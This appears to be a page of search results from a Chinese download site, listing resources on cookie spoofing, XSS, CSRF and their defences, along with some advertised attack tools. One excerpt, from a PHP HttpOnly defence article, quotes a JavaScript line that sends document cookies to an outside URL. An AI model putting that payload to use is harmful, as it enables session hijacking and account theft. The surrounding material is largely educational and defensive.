您好,欢迎光临本网站![请登录][注册会员]  

搜索资源列表

  1. Dboy Attack攻击工具箱 1.1

  2. Dboy Attack攻击工具箱 1.1,具有web探测,cookie欺骗,网络工具等
  3. 所属分类:Web开发

    • 发布日期:2009-05-30
    • 文件大小:717824
    • 提供者:dchua123
  1. F5的syn cookie防护技术

  2. F5基于syn cookie技术防护DOS攻击
  3. 所属分类:专业指导

    • 发布日期:2009-12-14
    • 文件大小:74752
    • 提供者:floatingcity
  1. cookie欺骗详解与防御技术

  2. 基于cookies的攻击与防御技术,讲述cookies攻击原理,攻击案例,以及防御技术
  3. 所属分类:专业指导

    • 发布日期:2011-02-16
    • 文件大小:5242880
    • 提供者:w422391713
  1. cookie攻击

  2. cookie注入攻击,很详细,包括COOKIE格式,Cookie欺骗原理,利用Javascr ipt来设置cookie等
  3. 所属分类:专业指导

    • 发布日期:2012-11-29
    • 文件大小:521216
    • 提供者:yls510723
  1. 利用Cookie攻击

  2. cookie欺骗,cookie注入 Cookie文件名称格式 设置cookie脚本
  3. 所属分类:专业指导

    • 发布日期:2012-12-03
    • 文件大小:459776
    • 提供者:yls510723
  1. 基于可变Cookie的跨域单点登录

  2. 针对单点登录中的跨域身份认证问题,提出了一种基于可变Cookie的方案解决跨域单点登录,使用随机数字生成票据,并作为传统加密算法的会话密钥对客户端的Cookie进行加密,采用现代加密算法在异域系统之间安全传递票据,每次认证产生新的票据并更新异域应用系统的Cookie。通过对票据产生和传输以及Cookie加密和常见攻击的安全性分析,可以实现跨域单点登录的功能并保证身份认证安全可信。
  3. 所属分类:Java

    • 发布日期:2013-01-29
    • 文件大小:360448
    • 提供者:xiaoerlang_3
  1. cookie攻击案例分析

  2. Cookie欺骗是常见的攻击网站方式,所谓Cookie欺骗,就是将别人的Cookie向服务器提交,冒充别人的身份登录网站。要用Cookie欺骗攻击某站,首先需要获得该站管理员的Cookie
  3. 所属分类:网络安全

  1. Session Cookie的HttpOnly和secure属性

  2. 一、属性说明: 1 secure属性 当设置为true时,表示创建的 Cookie 会被以安全的形式向服务器传输,也就是只能在 HTTPS 连接中被浏览器传递到服务器端进行会话验证,如果是 HTTP 连接则不会传递该信息,所以不会被窃取到Cookie 的具体内容。 2 HttpOnly属性 如果在Cookie中设置了"HttpOnly"属性,那么通过程序(JS脚本、Applet等)将无法读取到Cookie信息,这样能有效的防止XSS攻击。 对于以上两个属性, 首先,secure属性是防止信息在
  3. 所属分类:JavaME

    • 发布日期:2013-10-29
    • 文件大小:3072
    • 提供者:limei4625
  1. 关于cookie

  2. ppt介绍了cookie的基本知识,cookie欺骗产生的原理,跨站脚本攻击盗取Cookie,以及Cookie的安全对策
  3. 所属分类:讲义

    • 发布日期:2014-12-02
    • 文件大小:646144
    • 提供者:u013629435
  1. cookie修改器【黑客攻防必备】

  2. cookie修改器【黑客攻防必备】,不仅可以查看本机所有的cookie,还可以修改,备份。。 无论是开发或者攻击,都是必备的工具
  3. 所属分类:网络攻防

    • 发布日期:2008-11-12
    • 文件大小:89088
    • 提供者:bingbingcha
  1. cookie抓取器

  2. 很强力的cookie抓取器 CC攻击必备
  3. 所属分类:其它

    • 发布日期:2015-10-02
    • 文件大小:20480
    • 提供者:qq_31468035
  1. XSS攻击 代码演示

  2. 网站xss 攻击 代码示例,包括alert弹框,钓鱼网站截取用户cookie信息等;是学习xss的简单示例。可以下载玩玩看看,示例中的钓鱼网站地址为 演示地址,即本资源中的项目地址。xss也是很简单的,可以学习学习
  3. 所属分类:Java

    • 发布日期:2018-05-13
    • 文件大小:2097152
    • 提供者:u014308506
  1. 加强应用程序管理 避免间谍软件攻击

  2. 间谍软件现在已经泛滥,作为一个实际的问题,行业正在对它进行讨论。例如,cookie在有些供应商看来属于间谍软件,而另外一些则不这么认为。不过,在划界限的时候,间谍软件就成了一个大问题。IDC估计大约67%的电脑都带有某种形式的间谍软件,尽管其中有很大部分是家用电脑,但是间谍软件对企业的威胁还是不容忽视。
  3. 所属分类:其它

    • 发布日期:2020-03-04
    • 文件大小:29696
    • 提供者:weixin_38744803
  1. Django如何实现防止XSS攻击

  2. 一、什么是XSS攻击 xss攻击:—–>web注入   xss跨站脚本攻击(Cross site scr ipt,简称xss)是一种“HTML注入”,由于攻击的脚本多数时候是跨域的,所以称之为“跨域脚本”。   我们常常听到“注入”(Injection),如SQL注入,那么到底“注入”是什么?注入本质上就是把输入的数据变成可执行的程序语句。SQL注入是如此,XSS也如此,只不过XSS一般注入的是恶意的脚本代码,这些脚本代码可以用来获取合法用户的数据,如Cookie信息。 PS: 把
  3. 所属分类:其它

    • 发布日期:2020-12-16
    • 文件大小:64512
    • 提供者:weixin_38733875
  1. Flask模拟实现CSRF攻击的方法

  2. CSRF CSRF全拼为Cross Site Request Forgery,译为跨站请求伪造。 CSRF指攻击者盗用了你的身份,以你的名义发送恶意请求。 包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账…… 造成的问题:个人隐私泄露以及财产安全。 CSRF攻击示意图 客户端访问服务器时没有同服务器做安全验证 防止 CSRF 1.在客户端向后端请求界面数据的时候,后端会往响应中的 cookie 中设置 csrf_token 的值 2.在 Form 表单中添加一个隐藏
  3. 所属分类:其它

    • 发布日期:2020-12-24
    • 文件大小:1018880
    • 提供者:weixin_38557727
  1. 在Django中预防CSRF攻击的操作

  2. CSRF全拼为Cross Site Request Forgery,译为跨站请求伪造。 CSRF指攻击者盗用了你的身份,以你的名义发送恶意请求。 ( 包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账…) 造成的问题:个人隐私泄露以及财产安全。 CSRF攻击示意图 客户端访问服务器时没有同服务器做安全验证 防止 CSRF 攻击 步骤: 1. 在客户端向后端请求界面数据的时候,后端会往响应中的 cookie 中设置 csrf_token 的值 2. 在 Form 表单中添
  3. 所属分类:其它

    • 发布日期:2020-12-20
    • 文件大小:313344
    • 提供者:weixin_38500664
  1. xss防御之php利用httponly防xss攻击

  2. xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。 如下js获取cookie信息: 复制代码 代码如下:url=document.top.location.href;cookie=[removed];c=new Image();c.src=’http://www.test.com/c.php?c=’+cook
  3. 所属分类:其它

    • 发布日期:2020-12-19
    • 文件大小:46080
    • 提供者:weixin_38645208
  1. 利用Microsoft.XMLHTTP控件发送COOKIE

  2. 作者:czy  出处:http://www.nsfocus.net 日期:2003-09-03 (注意由于论坛会对文章中的一些字符作处理,所以最好到 http://www.chinansl.com/czy/xmlhttp.txt看文章 http://www.chinansl.com/czy/aspsky5.htm测试代码)     跨站脚本攻击想必各位都已经是很熟悉了,但是得到COOKIE的时候一直有一个 问题:总是要用WINDOW.OPEN弹一个窗体出来然后发送COOKIE,这样隐秘性 就大打
  3. 所属分类:其它

    • 发布日期:2021-01-01
    • 文件大小:72704
    • 提供者:weixin_38740848
  1. Django中如何防范CSRF跨站点请求伪造攻击的实现

  2. CSRF概念 CSRF跨站点请求伪造(Cross—Site Request Forgery)。 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。 CSRF攻击原理以及过程 用户C打开浏览器,访问受信任网站A,输入用户名和密码请求登录网站A; 在用户信息通过验证后,网站A产生Cookie信息并返回给浏览器,此时用户登录网站A成功,可以
  3. 所属分类:其它

    • 发布日期:2020-12-26
    • 文件大小:79872
    • 提供者:weixin_38500664
  1. 九、处理Cookie

  2. 9.1 Cookie概述    Cookie是服务器发送给浏览器的体积很小的纯文本信息,用户以后访问同一个Web服务器时浏览器会把它们原样发送给服务器。通过让服务器读取它原先保存到客户端的信息,网站能够为浏览者提供一系列的方便,例如在线交易过程中标识用户身份、安全要求不高的场合避免用户重复输入名字和密码、门户网站的主页定制、有针对性地投放广告,等等。    Cookie的目的就是为用户带来方便,为网站带来增值。虽然有着许多误传,事实上Cookie并不会造成严重的安全威胁。Cookie永远不会以任
  3. 所属分类:其它

    • 发布日期:2021-01-08
    • 文件大小:93184
    • 提供者:weixin_38663595
« 12 3 4 5 6 7 8 9 10 ... 17 »